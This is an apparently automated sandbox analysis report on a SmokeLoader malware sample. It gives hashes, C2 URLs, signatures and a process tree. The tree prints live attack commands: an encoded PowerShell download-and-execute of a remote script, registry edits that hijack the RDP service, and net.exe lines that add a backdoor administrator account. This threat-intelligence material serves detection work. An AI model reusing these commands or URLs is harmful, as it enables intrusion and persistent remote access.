Analysis
max time kernel: 151s
max time network: 150s
submitted: 01-01-1970 00:00
Static task: static1
Behavioral task: behavioral1
Sample: 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
Resource: win10-en-20210920
General
Target: 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
Size: 185KB
MD5: df63c915c8e793c30cdf10b5a47101ce
SHA1: 3a5bfbaa36fa76691b688eac1c8cc6872b92d54a
SHA256: 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2
SHA512: e27bb953864d738642d442326a0a4c5589dccfbbd209c8d7b3d375a2f7ad29884d6c457be245d3f2133d86cb60e4080da1887f5b58fd5f3363dc7d199a2549f0
Malware Config
Extracted
  https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
  Family: smokeloader
  Version: 2020
  C2:
  http://brandyjaggers.com/upload/
  http://andbal.com/upload/
  http://alotofquotes.com/upload/
  http://szpnc.cn/upload/
  http://uggeboots.com/upload/
  http://100klv.com/upload/
  http://rapmusic.at/upload/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow  pid   process
  57    3748  powershell.exe
  59    3748  powershell.exe
  60    3748  powershell.exe
  61    3748  powershell.exe
  63    3748  powershell.exe
  66    3748  powershell.exe
  68    3748  powershell.exe
  70    3748  powershell.exe
  72    3748  powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoCs)
  Processes:
  pid  process
  708  6EC3.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
  Processes:
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Deletes itself (1 IoCs)
  Processes:
  pid 3036 (process name not recorded)
- Loads dropped DLL (2 IoCs)
  Processes:
  pid 2220 (process name not recorded)
  pid 2220 (process name not recorded)
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description                   ioc                                                                            process
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT    powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI    powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (all by powershell.exe):
  File opened for modification  C:\Windows\branding\mediasrv.png
  File opened for modification  C:\Windows\branding\wupsvc.jpg
  File created                  C:\Windows\branding\mediasrv.png
  File created                  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC755.tmp
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC766.tmp
  File opened for modification  C:\Windows\branding\Basebrd
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  File opened for modification  C:\Windows\branding\ShellBrd
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_u2kmhszb.hfo.psm1
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0y1js3yg.vit.ps1
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC715.tmp
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC745.tmp
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC776.tmp
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  File created                  C:\Windows\branding\mediasvc.png
  File opened for modification  C:\Windows\branding\mediasvc.png
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes (all by 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe):
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- Modifies data under HKEY_USERS (64 IoCs)
  Processes (all by powershell.exe):
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description             flow  ioc
  HTTP User-Agent header  61    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  63    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  59    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  60    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  pid   process
  3844  440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
  3844  440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
  3036  (process name not recorded; this entry appears 62 times)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes:
  pid 3036 (process name not recorded)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid 640 (process name not recorded)
  pid 640 (process name not recorded)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
  pid   process
  3844  440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (all powershell.exe; tokens listed per pid in the order recorded):
  pid 3024: SeDebugPrivilege
  pid 1576: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 3988: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 1656: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
  pid 3036 (process name not recorded)
  pid 3036 (process name not recorded)
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes:
  pid 3036 (process name not recorded)
  pid 3036 (process name not recorded)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (each row is recorded twice in the report; 32 distinct rows):
  source pid  source process  target pid  target process
  3036        (not recorded)  708         6EC3.exe
  708         6EC3.exe        3024        powershell.exe
  3024        powershell.exe  3312        csc.exe
  3312        csc.exe         2392        cvtres.exe
  3024        powershell.exe  1576        powershell.exe
  3024        powershell.exe  3988        powershell.exe
  3024        powershell.exe  1656        powershell.exe
  3024        powershell.exe  4056        reg.exe
  3024        powershell.exe  3060        reg.exe
  3024        powershell.exe  3780        reg.exe
  3024        powershell.exe  3164        net.exe
  3164        net.exe         1936        net1.exe
  3024        powershell.exe  1868        cmd.exe
  3876        cmd.exe         3884        net.exe
  3884        net.exe         3492        net1.exe
  3024        powershell.exe  2324        cmd.exe
  2324        cmd.exe         3844        cmd.exe
  3844        cmd.exe         3088        net.exe
  3088        net.exe         2380        net1.exe
  3648        cmd.exe         2948        net.exe
  2948        net.exe         3996        net1.exe
  3424        cmd.exe         1360        net.exe
  1360        net.exe         2392        net1.exe
  3312        cmd.exe         3708        net.exe
  3708        net.exe         1144        net1.exe
  1256        cmd.exe         4084        net.exe
  4084        net.exe         1444        net1.exe
  3420        cmd.exe         1448        net.exe
  1448        net.exe         3052        net1.exe
  2952        cmd.exe         2760        net.exe
  2760        net.exe         3992        net1.exe
  2008        cmd.exe         1892        WMIC.exe
Processes
(depth in the process tree shown in brackets; indented lines are the signatures hit by that process)

[1] C:\Users\Admin\AppData\Local\Temp\440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\6EC3.exe
    command line: C:\Users\Admin\AppData\Local\Temp\6EC3.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.cmdline"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86D0.tmp" "c:\Users\Admin\AppData\Local\Temp\2bp10wzj\CSC20A7C651A2C142128975A83FC589745C.TMP"

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\reg.exe
        command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

    [3] C:\Windows\system32\reg.exe
        command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key

    [3] C:\Windows\system32\reg.exe
        command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

    [3] C:\Windows\system32\net.exe
        command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

      [4] C:\Windows\system32\cmd.exe
          command line: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            command line: net start rdpdr
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net1.exe
              command line: C:\Windows\system32\net1 start rdpdr

    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe
          command line: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\net.exe
            command line: net start TermService
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\net1.exe
              command line: C:\Windows\system32\net1 start TermService

    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      command line: net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user WgaUtilAcc Fu0qrwun /add
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      command line: net.exe user WgaUtilAcc Fu0qrwun /add
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user WgaUtilAcc Fu0qrwun /add

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user WgaUtilAcc Fu0qrwun
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      command line: net.exe user WgaUtilAcc Fu0qrwun
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user WgaUtilAcc Fu0qrwun

[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C wmic CPU get NAME

  [2] C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic CPU get NAME

[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

  [2] C:\Windows\system32\cmd.exe
      command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        (the -enc argument is base64 of a UTF-16LE string; it decodes to an IEX of Net.Webclient downloadstring for the raw.githubusercontent.com URL listed under Malware Config)
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.dll
  MD5: c05933f0e6f6642d5d647049e752305a
  SHA1: f71b5afc397a52b12d4a3400724ccc16254ab6b4
  SHA256: fc0e02bd55dbd993a7217e4157e30896bc8b0383fbb0e425943145ea92804ad4
  SHA512: 97b6352b5cb5ea961c337e1629c4270ae95cbff0eb49326de2afca6dff5e8850c179becda1893b9674b16794d2299ebbcb08cff9c2f71a170d428054860e40b6
C:\Users\Admin\AppData\Local\Temp\6EC3.exe
  MD5: 63151e4f7c3972f18a23c0e9996e14ef
  SHA1: 5d041fde6433a8ff8fc78a69fca1fd4630e3f270
  SHA256: cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
  SHA512: f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
C:\Users\Admin\AppData\Local\Temp\RES86D0.tmp
  MD5: 7b080a692dcbff151f2c4dd2556cfd7e
  SHA1: 71588a2e4d0c1852e6c8b2eae28a729ccc5c418e
  SHA256: 931078cc11e3dd4651909ed293e2c8ebf01ddc3e651b4ebd65263a0274042e7f
  SHA512: 929673007f5fbd3e08b46ea0c0012a7288e24e4ebe04456b8847f87543537372fbdcb507a43023488a5ceb7ecb83ea905fca28b87cd93f4342eba6c4baa925e8
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
  MD5: f783019c5dc4a5477d1ffd4f9f512979
  SHA1: 37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
  SHA256: 4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
